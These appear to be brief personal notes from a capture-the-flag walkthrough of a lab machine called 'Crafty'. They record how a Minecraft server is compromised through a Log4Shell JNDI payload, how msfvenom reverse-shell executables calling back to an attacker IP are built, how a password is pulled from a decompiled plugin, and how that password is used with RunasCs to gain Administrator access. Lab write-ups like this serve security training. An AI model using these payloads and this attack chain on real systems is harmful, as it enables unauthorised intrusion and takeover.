80,25565
minecraft version 1.16.5
echo "10.129.165.0 crafty.htb play.crafty.htb" >> /etc/hosts
run gobuster to find dir
/coming.soon /home
run dirsearch
no special found
try it
download
modify this function to be a windows payload:
python3 poc.py --userip 10.10.14.65 --webport 8000 --lport 6666
${jndi:ldap://10.10.14.65:1389/a}
here comes the payload i created
start minecraft
got the shell
c:\users\svc_minecraft\server>type usercache.json type usercache.json [{"name":"Serotonine_","uuid":"993d0aa7-1150-3684-9019-386c4f0262ae","expiresOn":"2024-03-11 00:52:01 -0700"}]
Privilege Name Description State ============================= ============================== ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
c:\>net users net users User accounts for \\CRAFTY ------------------------------------------------------------------------------- Administrator DefaultAccount Guest jacob svc_minecraft WDAGUtilityAccount
Directory of c:\Users\svc_minecraft\server\plugins 10/27/2023 01:48 PM <DIR> . 10/27/2023 01:48 PM <DIR> .. 10/27/2023 01:48 PM 9,996 playercounter-1.0-SNAPSHOT.jar 1 File(s) 9,996 bytes 2 Dir(s) 2,847,625,216 bytes free
dowload it
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.65 LPORT=4444 -f exe -o reverse.exe -> msfconsole
cd %temp% download
open jd-gui
sudo dpkg -i jd-gui-1.6.6.deb
found a credential-like inside the .jar file
back to the lab machine, we try this credential
s67u84zKq8IXw
upload Runascs.exe msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.65 LPORT=7777 -f exe -o reverse2.exe upload reverse2.exe ->msfconsole
RunasCs.exe "Administrator" "s67u84zKq8IXw" "reverse2.exe"
get the root!